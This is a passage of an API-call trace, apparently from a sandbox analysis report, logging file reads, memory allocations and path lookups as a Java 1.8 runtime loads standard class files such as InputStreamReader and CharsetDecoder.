lpNumberOfBytesRead=0x208ca80*=0x1e, lpOverlapped=0x0) returned 1 [0097.546] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3167bc5, lpNewFilePointer=0x208cb10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cb10*=51805125) returned 1 [0097.546] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0x1c2, lpNumberOfBytesRead=0x208cae0, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x208cae0*=0x1c2, lpOverlapped=0x0) returned 1 [0097.547] free (_Block=0x121d7d30) [0097.547] free (_Block=0x121d9210) [0097.549] strlen (_Str="java/io/InputStreamReader.class") returned 0x1f [0097.549] malloc (_Size=0x48) returned 0x121d9ad0 [0097.549] malloc (_Size=0xa0) returned 0x1221be60 [0097.549] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ab4f, lpNewFilePointer=0x208c470, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c470*=54635343) returned 1 [0097.549] ReadFile (in: hFile=0x134, lpBuffer=0x1221be60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c440, lpOverlapped=0x0 | out: lpBuffer=0x1221be60*, lpNumberOfBytesRead=0x208c440*=0xa0, lpOverlapped=0x0) returned 1 [0097.549] malloc (_Size=0x20) returned 0x121d8180 [0097.549] free (_Block=0x1221be60) [0097.549] strlen (_Str="java/io/InputStreamReader.class") returned 0x1f [0097.550] strcpy (in: _Dest=0x208c5f0, _Source="java/io/InputStreamReader.class" | out: _Dest="java/io/InputStreamReader.class") returned="java/io/InputStreamReader.class" [0097.550] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316743d, lpNewFilePointer=0x208c070, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c070*=51803197) returned 1 [0097.550] ReadFile (in: hFile=0x134, lpBuffer=0x208c0c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c040, lpOverlapped=0x0 | out: lpBuffer=0x208c0c0*, lpNumberOfBytesRead=0x208c040*=0x1e, lpOverlapped=0x0) returned 1 [0097.550] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x316747a, lpNewFilePointer=0x208c0d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0d0*=51803258) returned 1 [0097.550] ReadFile (in: hFile=0x134, lpBuffer=0x2102b70, nNumberOfBytesToRead=0x715, lpNumberOfBytesRead=0x208c0a0, lpOverlapped=0x0 | out: lpBuffer=0x2102b70*, lpNumberOfBytesRead=0x208c0a0*=0x715, lpOverlapped=0x0) returned 1 [0097.550] free (_Block=0x121d7af0) [0097.550] free (_Block=0x121d9da0) [0097.559] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\meta-index") returned 0x35 [0097.559] malloc (_Size=0x76) returned 0x1221ccb0 [0097.559] wcscpy (in: _Dest=0x1221ccb0, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\meta-index" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\meta-index") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\meta-index" [0097.559] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext\\meta-index"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x210 [0097.560] free (_Block=0x1221ccb0) [0097.560] malloc (_Size=0x48) returned 0x121d9940 [0097.561] malloc (_Size=0xa0) returned 0x1221de70 [0097.561] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341ab03, lpNewFilePointer=0x208cb10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cb10*=54635267) returned 1 [0097.561] ReadFile (in: hFile=0x134, lpBuffer=0x1221de70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cae0, lpOverlapped=0x0 | out: lpBuffer=0x1221de70*, lpNumberOfBytesRead=0x208cae0*=0xa0, lpOverlapped=0x0) returned 1 [0097.561] malloc (_Size=0x1f) returned 0x121d7d30 [0097.561] free (_Block=0x1221de70) [0097.561] strlen (_Str="sun/nio/cs/StreamDecoder.class") returned 0x1e [0097.561] strcpy (in: _Dest=0x208cc90, _Source="sun/nio/cs/StreamDecoder.class" | out: _Dest="sun/nio/cs/StreamDecoder.class") returned="sun/nio/cs/StreamDecoder.class" [0097.561] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3165996, lpNewFilePointer=0x208c710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c710*=51796374) returned 1 [0097.561] ReadFile (in: hFile=0x134, lpBuffer=0x208c760, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c6e0, lpOverlapped=0x0 | out: lpBuffer=0x208c760*, lpNumberOfBytesRead=0x208c6e0*=0x1e, lpOverlapped=0x0) returned 1 [0097.601] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31659d2, lpNewFilePointer=0x208c770, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c770*=51796434) returned 1 [0097.601] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x1a6b, lpNumberOfBytesRead=0x208c740, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c740*=0x1a6b, lpOverlapped=0x0) returned 1 [0097.657] free (_Block=0x121d8180) [0097.657] free (_Block=0x121d9ad0) [0097.668] strlen (_Str="sun/nio/cs/MS1252") returned 0x11 [0097.669] strlen (_Str="sun/nio/cs/MS1252.class") returned 0x17 [0097.669] malloc (_Size=0x48) returned 0x121d9440 [0097.669] malloc (_Size=0xa0) returned 0x1221de70 [0097.669] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341bd7d, lpNewFilePointer=0x208d030, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d030*=54639997) returned 1 [0097.669] ReadFile (in: hFile=0x134, lpBuffer=0x1221de70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d000, lpOverlapped=0x0 | out: lpBuffer=0x1221de70*, lpNumberOfBytesRead=0x208d000*=0xa0, lpOverlapped=0x0) returned 1 [0097.669] malloc (_Size=0x18) returned 0x1221b3e0 [0097.669] free (_Block=0x1221de70) [0097.670] strlen (_Str="sun/nio/cs/MS1252.class") returned 0x17 [0097.670] strcpy (in: _Dest=0x208d1b0, _Source="sun/nio/cs/MS1252.class" | out: _Dest="sun/nio/cs/MS1252.class") returned="sun/nio/cs/MS1252.class" [0097.670] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31848c9, lpNewFilePointer=0x208cc30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc30*=51923145) returned 1 [0097.670] ReadFile (in: hFile=0x134, lpBuffer=0x208cc80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cc00, lpOverlapped=0x0 | out: lpBuffer=0x208cc80*, lpNumberOfBytesRead=0x208cc00*=0x1e, lpOverlapped=0x0) returned 1 [0097.670] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31848fe, lpNewFilePointer=0x208cc90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc90*=51923198) returned 1 [0097.670] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x6e0, lpNumberOfBytesRead=0x208cc60, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208cc60*=0x6e0, lpOverlapped=0x0) returned 1 [0097.670] free (_Block=0x121d7d30) [0097.670] free (_Block=0x121d9940) [0097.682] strlen (_Str="sun/nio/cs/SingleByte$Decoder.class") returned 0x23 [0097.682] malloc (_Size=0x48) returned 0x121d90d0 [0097.682] malloc (_Size=0xa0) returned 0x1221de70 [0097.682] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341aab2, lpNewFilePointer=0x208cc80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc80*=54635186) returned 1 [0097.682] ReadFile (in: hFile=0x134, lpBuffer=0x1221de70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cc50, lpOverlapped=0x0 | out: lpBuffer=0x1221de70*, lpNumberOfBytesRead=0x208cc50*=0xa0, lpOverlapped=0x0) returned 1 [0097.682] malloc (_Size=0x24) returned 0x121d7af0 [0097.683] free (_Block=0x1221de70) [0097.683] strlen (_Str="sun/nio/cs/SingleByte$Decoder.class") returned 0x23 [0097.683] strcpy (in: _Dest=0x208ce00, _Source="sun/nio/cs/SingleByte$Decoder.class" | out: _Dest="sun/nio/cs/SingleByte$Decoder.class") returned="sun/nio/cs/SingleByte$Decoder.class" [0097.683] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3165181, lpNewFilePointer=0x208c880, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c880*=51794305) returned 1 [0097.683] ReadFile (in: hFile=0x134, lpBuffer=0x208c8d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c850, lpOverlapped=0x0 | out: lpBuffer=0x208c8d0*, lpNumberOfBytesRead=0x208c850*=0x1e, lpOverlapped=0x0) returned 1 [0097.683] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31651c2, lpNewFilePointer=0x208c8e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c8e0*=51794370) returned 1 [0097.683] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x7d4, lpNumberOfBytesRead=0x208c8b0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c8b0*=0x7d4, lpOverlapped=0x0) returned 1 [0097.683] free (_Block=0x1221b3e0) [0097.684] free (_Block=0x121d9440) [0097.685] strlen (_Str="sun/nio/cs/ArrayDecoder.class") returned 0x1d [0097.685] malloc (_Size=0x48) returned 0x121d9670 [0097.685] malloc (_Size=0xa0) returned 0x1221de70 [0097.685] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341aa67, lpNewFilePointer=0x208c1c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c1c0*=54635111) returned 1 [0097.685] ReadFile (in: hFile=0x134, lpBuffer=0x1221de70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c190, lpOverlapped=0x0 | out: lpBuffer=0x1221de70*, lpNumberOfBytesRead=0x208c190*=0xa0, lpOverlapped=0x0) returned 1 [0097.685] malloc (_Size=0x1e) returned 0x121d7a30 [0097.685] free (_Block=0x1221de70) [0097.686] strlen (_Str="sun/nio/cs/ArrayDecoder.class") returned 0x1d [0097.686] strcpy (in: _Dest=0x208c340, _Source="sun/nio/cs/ArrayDecoder.class" | out: _Dest="sun/nio/cs/ArrayDecoder.class") returned="sun/nio/cs/ArrayDecoder.class" [0097.686] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31650de, lpNewFilePointer=0x208bdc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bdc0*=51794142) returned 1 [0097.686] ReadFile (in: hFile=0x134, lpBuffer=0x208be10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bd90, lpOverlapped=0x0 | out: lpBuffer=0x208be10*, lpNumberOfBytesRead=0x208bd90*=0x1e, lpOverlapped=0x0) returned 1 [0097.686] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3165119, lpNewFilePointer=0x208be20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be20*=51794201) returned 1 [0097.686] ReadFile (in: hFile=0x134, lpBuffer=0x21033a0, nNumberOfBytesToRead=0x68, lpNumberOfBytesRead=0x208bdf0, lpOverlapped=0x0 | out: lpBuffer=0x21033a0*, lpNumberOfBytesRead=0x208bdf0*=0x68, lpOverlapped=0x0) returned 1 [0097.686] free (_Block=0x121d7af0) [0097.686] free (_Block=0x121d90d0) [0097.690] strlen (_Str="java/nio/charset/CharsetDecoder.class") returned 0x25 [0097.690] malloc (_Size=0x48) returned 0x121d96c0 [0097.690] malloc (_Size=0xa0) returned 0x1221de70 [0097.690] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341aa14, lpNewFilePointer=0x208c240, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c240*=54635028) returned 1 [0097.690] ReadFile (in: hFile=0x134, lpBuffer=0x1221de70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c210, lpOverlapped=0x0 | out: lpBuffer=0x1221de70*, lpNumberOfBytesRead=0x208c210*=0xa0, lpOverlapped=0x0) returned 1 [0097.690] malloc (_Size=0x26) returned 0x121d7d30 [0097.691] free (_Block=0x1221de70) [0097.691] strlen (_Str="java/nio/charset/CharsetDecoder.class") returned 0x25 [0097.691] strcpy (in: _Dest=0x208c3c0, _Source="java/nio/charset/CharsetDecoder.class" | out: _Dest="java/nio/charset/CharsetDecoder.class") returned="java/nio/charset/CharsetDecoder.class" [0097.691] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3163ba5, lpNewFilePointer=0x208be40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be40*=51788709) returned 1 [0097.691] ReadFile (in: hFile=0x134, lpBuffer=0x208be90, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208be10, lpOverlapped=0x0 | out: lpBuffer=0x208be90*, lpNumberOfBytesRead=0x208be10*=0x1e, lpOverlapped=0x0) returned 1 [0097.746] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3163be8, lpNewFilePointer=0x208bea0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bea0*=51788776) returned 1 [0097.746] ReadFile (in: hFile=0x134, lpBuffer=0x21033b0, nNumberOfBytesToRead=0x14f6, lpNumberOfBytesRead=0x208be70, lpOverlapped=0x0 | out: lpBuffer=0x21033b0*, lpNumberOfBytesRead=0x208be70*=0x14f6, lpOverlapped=0x0) returned 1 [0097.812] free (_Block=0x121d7a30) [0097.813] free (_Block=0x121d9670) [0097.832] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0097.832] malloc (_Size=0x800) returned 0x1221ded0 [0097.832] _wfullpath (in: _Buffer=0x1221ded0, _Path="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext", _BufferCount=0x400 | out: _Buffer="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext" [0097.832] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0097.832] wcsncmp (_String1="C:\\P", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0097.832] wcslen (_String="C:\\Program Files") returned 0x10 [0097.832] FindFirstFileW (in: lpFileName="C:\\Program Files", lpFindFileData=0x208d2b0 | out: lpFindFileData=0x208d2b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x61f7ccc8, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x61f7ccc8, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x12130000, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 0x426860 [0097.832] FindClose (in: hFindFile=0x426860 | out: hFindFile=0x426860) returned 1 [0097.832] wcslen (_String="Program Files") returned 0xd [0097.832] wcslen (_String="C:\\Program Files\\Java") returned 0x15 [0097.833] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java", lpFindFileData=0x208d2b0 | out: lpFindFileData=0x208d2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1d180aa, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0x5848ff34, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x5848ff34, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x12130000, cFileName="Java", cAlternateFileName="")) returned 0x425f00 [0097.833] FindClose (in: hFindFile=0x425f00 | out: hFindFile=0x425f00) returned 1 [0097.833] wcslen (_String="Java") returned 0x4 [0097.833] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171") returned 0x22 [0097.833] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171", lpFindFileData=0x208d2b0 | out: lpFindFileData=0x208d2b0*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xe1d180aa, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xf4cc0a4e, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xf4cc0a4e, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x12130000, cFileName="jre1.8.0_171", cAlternateFileName="JRE18~1.0_1")) returned 0x426560 [0097.833] FindClose (in: hFindFile=0x426560 | out: hFindFile=0x426560) returned 1 [0097.833] wcslen (_String="jre1.8.0_171") returned 0xc [0097.833] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib") returned 0x26 [0097.833] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib", lpFindFileData=0x208d2b0 | out: lpFindFileData=0x208d2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb3761f6, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed126697, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed126697, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x12130000, cFileName="lib", cAlternateFileName="")) returned 0x425d20 [0097.834] FindClose (in: hFindFile=0x425d20 | out: hFindFile=0x425d20) returned 1 [0097.834] wcslen (_String="lib") returned 0x3 [0097.834] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0097.834] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext", lpFindFileData=0x208d2b0 | out: lpFindFileData=0x208d2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb394937, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed1ee857, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed1ee857, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x12130000, cFileName="ext", cAlternateFileName="")) returned 0x4263e0 [0097.834] FindClose (in: hFindFile=0x4263e0 | out: hFindFile=0x4263e0) returned 1 [0097.834] wcslen (_String="ext") returned 0x3 [0097.834] free (_Block=0x1221ded0) [0097.835] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0097.902] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0097.902] malloc (_Size=0x60) returned 0x1220f800 [0097.902] wcscpy (in: _Dest=0x1220f800, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext" [0097.902] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext", nBufferLength=0x9, lpBuffer=0x208dce8, lpFilePart=0x208dce0 | out: lpBuffer="", lpFilePart=0x208dce0*=0x0) returned 0x2b [0097.902] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext"), fInfoLevelId=0x0, lpFileInformation=0x208da80 | out: lpFileInformation=0x208da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb394937, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed1ee857, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed1ee857, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0097.902] free (_Block=0x1220f800) [0097.902] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned 0x2a [0097.902] malloc (_Size=0x60) returned 0x1220fa30 [0097.903] wcscpy (in: _Dest=0x1220fa30, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext" [0097.903] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext", nBufferLength=0x9, lpBuffer=0x208dce8, lpFilePart=0x208dce0 | out: lpBuffer="", lpFilePart=0x208dce0*=0x0) returned 0x2b [0097.903] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\ext" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\ext"), fInfoLevelId=0x0, lpFileInformation=0x208da80 | out: lpFileInformation=0x208da80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeb394937, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0xed1ee857, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0xed1ee857, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0097.903] free (_Block=0x1220fa30) [0097.906] strlen (_Str="java/nio/CharBuffer.class") returned 0x19 [0097.906] malloc (_Size=0x48) returned 0x121d9c60 [0097.906] malloc (_Size=0xa0) returned 0x1221de70 [0097.906] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a9cd, lpNewFilePointer=0x208c8c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c8c0*=54634957) returned 1 [0097.906] ReadFile (in: hFile=0x134, lpBuffer=0x1221de70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c890, lpOverlapped=0x0 | out: lpBuffer=0x1221de70*, lpNumberOfBytesRead=0x208c890*=0xa0, lpOverlapped=0x0) returned 1 [0097.906] malloc (_Size=0x1a) returned 0x121d80c0 [0097.907] free (_Block=0x1221de70) [0097.907] strlen (_Str="java/nio/CharBuffer.class") returned 0x19 [0097.907] strcpy (in: _Dest=0x208ca40, _Source="java/nio/CharBuffer.class" | out: _Dest="java/nio/CharBuffer.class") returned="java/nio/CharBuffer.class" [0097.907] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31624e2, lpNewFilePointer=0x208c4c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c4c0*=51782882) returned 1 [0097.907] ReadFile (in: hFile=0x134, lpBuffer=0x208c510, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c490, lpOverlapped=0x0 | out: lpBuffer=0x208c510*, lpNumberOfBytesRead=0x208c490*=0x1e, lpOverlapped=0x0) returned 1 [0097.962] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3162519, lpNewFilePointer=0x208c520, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c520*=51782937) returned 1 [0097.962] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0x168c, lpNumberOfBytesRead=0x208c4f0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c4f0*=0x168c, lpOverlapped=0x0) returned 1 [0097.963] free (_Block=0x121d7d30) [0097.963] free (_Block=0x121d96c0) [0097.986] strlen (_Str="java/nio/HeapCharBuffer.class") returned 0x1d [0097.987] malloc (_Size=0x48) returned 0x121d9670 [0097.987] malloc (_Size=0xa0) returned 0x1221de70 [0097.987] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a982, lpNewFilePointer=0x208cb20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cb20*=54634882) returned 1 [0097.987] ReadFile (in: hFile=0x134, lpBuffer=0x1221de70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208caf0, lpOverlapped=0x0 | out: lpBuffer=0x1221de70*, lpNumberOfBytesRead=0x208caf0*=0xa0, lpOverlapped=0x0) returned 1 [0097.987] malloc (_Size=0x1e) returned 0x121d7a30 [0097.987] free (_Block=0x1221de70) [0097.988] strlen (_Str="java/nio/HeapCharBuffer.class") returned 0x1d [0097.988] strcpy (in: _Dest=0x208cca0, _Source="java/nio/HeapCharBuffer.class" | out: _Dest="java/nio/HeapCharBuffer.class") returned="java/nio/HeapCharBuffer.class" [0097.988] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31619f6, lpNewFilePointer=0x208c720, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c720*=51780086) returned 1 [0097.988] ReadFile (in: hFile=0x134, lpBuffer=0x208c770, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c6f0, lpOverlapped=0x0 | out: lpBuffer=0x208c770*, lpNumberOfBytesRead=0x208c6f0*=0x1e, lpOverlapped=0x0) returned 1 [0098.051] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3161a31, lpNewFilePointer=0x208c780, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c780*=51780145) returned 1 [0098.051] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0xab1, lpNumberOfBytesRead=0x208c750, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c750*=0xab1, lpOverlapped=0x0) returned 1 [0098.051] free (_Block=0x121d80c0) [0098.052] free (_Block=0x121d9c60) [0098.060] malloc (_Size=0x48) returned 0x121d93f0 [0098.060] malloc (_Size=0xa0) returned 0x1221de70 [0098.060] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a932, lpNewFilePointer=0x208c8b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c8b0*=54634802) returned 1 [0098.060] ReadFile (in: hFile=0x134, lpBuffer=0x1221de70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c880, lpOverlapped=0x0 | out: lpBuffer=0x1221de70*, lpNumberOfBytesRead=0x208c880*=0xa0, lpOverlapped=0x0) returned 1 [0098.061] malloc (_Size=0x23) returned 0x121d7d30 [0098.061] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3160f45, lpNewFilePointer=0x208c4b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c4b0*=51777349) returned 1 [0098.061] ReadFile (in: hFile=0x134, lpBuffer=0x208c500, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c480, lpOverlapped=0x0 | out: lpBuffer=0x208c500*, lpNumberOfBytesRead=0x208c480*=0x1e, lpOverlapped=0x0) returned 1 [0098.129] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3160f85, lpNewFilePointer=0x208c510, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c510*=51777413) returned 1 [0098.129] ReadFile (in: hFile=0x134, lpBuffer=0x2102a30, nNumberOfBytesToRead=0xa71, lpNumberOfBytesRead=0x208c4e0, lpOverlapped=0x0 | out: lpBuffer=0x2102a30*, lpNumberOfBytesRead=0x208c4e0*=0xa71, lpOverlapped=0x0) returned 1 [0098.134] strlen (_Str="java/nio/charset/CoderResult$1.class") returned 0x24 [0098.134] malloc (_Size=0x48) returned 0x121d9080 [0098.134] malloc (_Size=0xa0) returned 0x1221de70 [0098.134] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341a8e0, lpNewFilePointer=0x208c0d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0d0*=54634720) returned 1 [0098.134] ReadFile (in: hFile=0x134, lpBuffer=0x1221de70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c0a0, lpOverlapped=0x0 | out: lpBuffer=0x1221de70*, lpNumberOfBytesRead=0x208c0a0*=0xa0, lpOverlapped=0x0) returned 1 [0098.134] malloc (_Size=0x25) returned 0x121d80c0 [0098.134] free (_Block=0x1221de70) [0098.135] strlen (_Str="java/nio/charset/CoderResult$1.class") returned 0x24 [0098.135] strcpy (in: _Dest=0x208c250, _Source="java/nio/charset/CoderResult$1.class" | out: _Dest="java/nio/charset/CoderResult$1.class") returned="java/nio/charset/CoderResult$1.class" [0098.135] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3160d48, lpNewFilePointer=0x208bcd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bcd0*=51776840) returned 1 [0098.135] ReadFile (in: hFile=0x134, lpBuffer=0x208bd20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bca0, lpOverlapped=0x0 | out: lpBuffer=0x208bd20*, lpNumberOfBytesRead=0x208bca0*=0x1e, lpOverlapped=0x0) returned 1 [0098.135] SetFilePointerEx (in: hFile=0x134, 